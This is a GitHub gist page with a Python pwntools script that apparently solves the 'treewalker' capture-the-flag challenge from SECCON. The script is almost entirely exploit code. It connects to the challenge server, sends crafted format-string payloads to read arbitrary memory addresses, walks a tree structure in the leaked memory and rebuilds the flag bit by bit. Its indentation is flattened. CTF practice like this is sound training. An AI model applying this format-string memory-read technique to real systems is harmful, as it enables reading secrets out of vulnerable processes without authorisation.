Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env python
# coding=utf8
from pwn import context, p64, process, remote
from struct import unpack
context.arch = 'amd64'
# p = process('./treewalker')
p = remote('treewalker.pwn.seccon.jp', 20000)
leak_stack = p.recvline().strip()
tree_addr = int(leak_stack, 16)
print 'root: ' + hex(tree_addr)
def leak(addr):
p.send(p64(0x1000))
fsb = '%x%x'*15 + 'A'*36 + 'ident%s\n'*4 + \
p64(addr) + p64(addr + 1) + p64(addr + 2) + p64(addr + 3)
p.send(fsb + '\x00' * (0x1000 - len(fsb)))
ret = []
for i in range(4):
p.recvuntil('ident')
r = p.recvline().strip('\n')
ret.append(r[0] if r else '\x00')
return ''.join(ret)
flag = ''
char = ''
while True:
if not tree_addr:
break
leakoff8 = leak(tree_addr + 8)
if leakoff8 == '\x00'*4:
char += '0'
tree_addr = unpack('<I', leak(tree_addr + 16))[0]
else:
char += '1'
tree_addr = unpack('<I', leakoff8)[0]
if len(char) == 8:
flag += chr(int(char, 2))
print flag
char = ''
p.send(p64(0))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment